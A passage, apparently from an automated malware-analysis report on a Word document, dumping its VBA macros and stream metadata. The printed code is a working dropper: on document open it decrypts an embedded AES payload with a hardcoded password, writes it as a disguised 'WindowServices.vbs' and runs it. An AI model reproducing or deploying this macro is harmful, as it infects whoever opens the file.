    Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #Else
    Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #End If
#End If

'=========================================================================
' Constants and member variables
'=========================================================================

Private Const AES_BLOCK_SIZE        As Long = 16
Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
Private Const KDF_SALTLEN           As Long = 8
Private Const KDF_ITER              As Long = 10000
Private Const KDF_HASH              As String = "SHA512"
Private Const HMAC_HASH             As String = "SHA256"
Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
Private Const OPENSSL_MAGICLEN      As Long = 8
Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"

Private Type UcsCryptoContextType
    hPbkdf2Alg          As LongPtr
    hHmacAlg            As LongPtr
    hHmacHash           As LongPtr
    HashLen             As Long
    hAesAlg             As LongPtr
    hAesKey             As LongPtr
    AesKeyObjData()     As Byte
    AesKeyObjLen        As Long
    Nonce(0 To 3)       As Long
    EncrData()          As Byte
    EncrPos             As Long
    LastError           As String
End Type

Private m_uChunkedCtx           As UcsCryptoContextType

'=========================================================================
' Functions
'=========================================================================

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sError          As String
    
    baData = ToUtf8Array(sText)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
        Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    If Not IsArray(Password) Then
        ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
        If UBound(baData) >= PREFIXLEN Then
            Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
        End If
        Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
        Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
    End If
    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
End Function

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sMagic          As String
    Dim sError          As String
    
    baData = FromBase64Array(sEncr)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        If UBound(baData) >= PREFIXLEN - 1 Then
            sMagic = String$(OPENSSL_MAGICLEN, 0)
            Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
            If sMagic = OPENSSL_MAGIC Then
                ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                If UBound(baData) >= PREFIXLEN Then
                    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                    ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                Else
                    baData = vbNullString
                End If
            End If
        End If
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    AesDecryptString = FromUtf8Array(baData)
End Function

Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
    Const VT_BYREF      As Long = &H4000
    Dim uCtx            As UcsCryptoContextType
    Dim vErr            As Variant
    Dim bHashBefore     As Boolean
    Dim bHashAfter      As Boolean
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim baTemp()        As Byte
    Dim lPtr            As LongPtr
    
    On Error GoTo EH
    If IsArray(Hmac) Then
        bHashBefore = (Hmac(0) <= 0)
        bHashAfter = (Hmac(0) > 0)
    End If
    If IsMissing(Password) Then
        baPass = vbNullString
    ElseIf IsArray(Password) Then
        baPass = Password
    Else
        baPass = ToUtf8Array(Password & vbNullString)
    End If
    If IsMissing(Salt) Then
        baSalt = baPass
    ElseIf IsArray(Salt) Then
        baSalt = Salt
    Else
        baSalt = ToUtf8Array(Salt & vbNullString)
    End If
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If IsArray(Hmac) Then
        baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
        #If Win64 Then
            lPtr = PeekPtr(VarPtr(Hmac) + 8)
        #Else
            lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
        #End If
        If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
            lPtr = PeekPtr(lPtr)
        End If
        #If Win64 Then
            lPtr = PeekPtr(lPtr + 16)
        #Else
            lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
        #End If
        Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
    End If
    '--- success
    AesCryptArray = True
QH:
    pvCryptoAesCtrTerminate uCtx
    Exit Function
EH:
    vErr = Array(Err.Number, Err.Source, Err.Description)
    pvCryptoAesCtrTerminate uCtx
    Err.Raise vErr(0), vErr(1), vErr(2)
End Function

Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
    Dim baEmpty()       As Byte
    Dim baKey()         As Byte
    
    pvCryptoAesCtrTerminate m_uChunkedCtx
    baEmpty = vbNullString
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
End Function

Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
    If m_uChunkedCtx.hAesAlg = 0 Then
        m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
        Exit Function
    End If
    baOutput = baInput
    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
    If Final Then
        pvCryptoAesCtrTerminate m_uChunkedCtx
    End If
End Function

Public Function AesChunkedGetLastError() As String
    AesChunkedGetLastError = m_uChunkedCtx.LastError
End Function

'= private ===============================================================

Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
    Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
    Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
    Dim hResult         As Long
    
    With uCtx
        '--- init member vars
        .EncrData = vbNullString
        .EncrPos = 0
        .LastError = vbNullString
        ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
        If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
            '--- generate RFC 2898 based derived key
            On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
            hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
            If hResult < 0 Then
                GoTo QH
            End If
            hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
            If hResult < 0 Then
                GoTo QH
            End If
            On Error GoTo 0
        End If
        '--- init AES key from first half of derived key
        On Error GoTo EH_Unsupported '--- CNG API missing on XP
        hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
        If hResult < 0 Then
            GoTo QH
        End If
        On Error GoTo 0
        hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
        If hResult < 0 Then
            GoTo QH
        End If
        ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
        hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        '--- init AES IV from second half of derived key
        Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
        '--- init HMAC key from last HashLen bytes of derived key
        hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
    End With
    '--- success
    pvCryptoAesCtrInit = True
    Exit Function
QH:
    uCtx.LastError = GetSystemMessage(hResult)
    Exit Function
EH_Unsupported:
    uCtx.LastError = ERR_UNSUPPORTED_ENCR
End Function

Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
    With uCtx
        If .hPbkdf2Alg <> 0 Then
            Call BCryptCloseAlgorithmProvider(.

    VBA File Name: ThisDocument.cls, Stream Size: 1565
    General
    Stream Path:Macros/VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:1565
    Data ASCII:. . . . . . . . . . . . . . . . . . . 9 . . . G . . . + . . . . . . . . . . . A . V . . . . . . . . . . . . . . . . . . . p . . . c ; . L C n . . ( . [ M h . . . . . . . . . . . . . . . . . . . . . . } ^ V H ( . e . . . . . . . . . . . . . . . . . . . . . . . . x . . . . } ^ V H ( . e . . c ; . L C n . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . P . . . . . S " . . . . S . . . . . S " . . . . " 2 . . . . . 6 " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . . . . . ( . 1 . N . o .
    Data Raw:01 16 03 00 04 00 01 00 00 e4 03 00 00 e4 00 00 00 12 02 00 00 39 04 00 00 47 04 00 00 2b 05 00 00 01 00 00 00 01 00 00 00 96 41 07 56 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 9d 63 b7 3b c7 dc 87 4c 94 be 43 f7 8b 6e e2 08 18 85 28 c9 9b f5 5b 4d 82 68 e2 e4 98 18 00 97 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim keooo As New keoaoe
    keooo.TestAES
    
End Sub

    VBA File Name: ThisDocument1.cls, Stream Size: 1107
    General
    Stream Path:Macros/VBA/ThisDocument1
    VBA File Name:ThisDocument1.cls
    Stream Size:1107
    Data ASCII:. . . . . . . . 2 . . . . . . . . . . 9 . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S . . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . F . C . F . B . 3 . D . 2 . A . - .
    Data Raw:01 16 03 00 01 f0 00 00 00 32 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 03 00 00 8d 03 00 00 00 00 00 00 01 00 00 00 96 41 8f b6 00 00 ff ff 03 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

    VBA File Name: keoaoe.cls, Stream Size: 11693
    General
    Stream Path:Macros/VBA/keoaoe
    VBA File Name:keoaoe.cls
    Stream Size:11693
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . p . . . . . y L . u W . X * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . W . Q E . . A . . . . . . . . . . . . . . . . . . . . . . . x . . . . W . Q E . . A . . . y L . u W . X . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S . . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . F . C . F . B . 3 . D . 2 . A . - . A . 0 . F . A . - . 1 . 0 .
    Data Raw:01 16 03 00 02 00 01 00 00 b2 04 00 00 e4 00 00 00 10 02 00 00 e0 04 00 00 ee 04 00 00 fa 19 00 00 00 00 00 00 01 00 00 00 96 41 0b 1d 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 cc a7 e3 c4 be 79 a3 4c b3 ae 00 75 57 cd a0 58 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "keoaoe"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub TestAES()
    Dim key As String
    Dim decryptedText As String
    Dim i As Integer
    Dim parts(1 To 60) As String
    Dim allDecryptedText As String
    Dim chunkSize As Integer
    Dim tempFilePath As String

    ' ?t kha AES
    key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
    Dim encryptedText As String
    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
    decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m

    ' Kch thu?c c?a m?i ph?n
    chunkSize = 3000  ' Kch thu?c m?i ph?n
    Dim outputFilePath As String
    ' Luu ton b? n?i dung gi?i m vo t?p VBS
    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    ' Ghi t?ng ph?n ra t?p
    Open vbsFilePath For Output As #1
    For i = 1 To Len(decryptedText) Step chunkSize
        partText = Mid(decryptedText, i, chunkSize)
        Print #1, partText  ' Ghi t?ng ph?n vo t?p
    Next i
    Close #1

    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run """" & vbsFilePath & """", 1, True


End Sub

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
    General
    Stream Path:\x1CompObj
    CLSID:
    File Type:data
    Stream Size:114
    Entropy:4.235956365095031
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    CLSID:
    File Type:data
    Stream Size:4096
    Entropy:0.2427468033329246
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    CLSID:
    File Type:data
    Stream Size:4096
    Entropy:0.4626668981671506
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
    Stream Path: 1Table, File Type: data, Stream Size: 7087
    General
    Stream Path:1Table
    CLSID:
    File Type:data
    Stream Size:7087
    Entropy:5.915480654085043
    Base64 Encoded:True
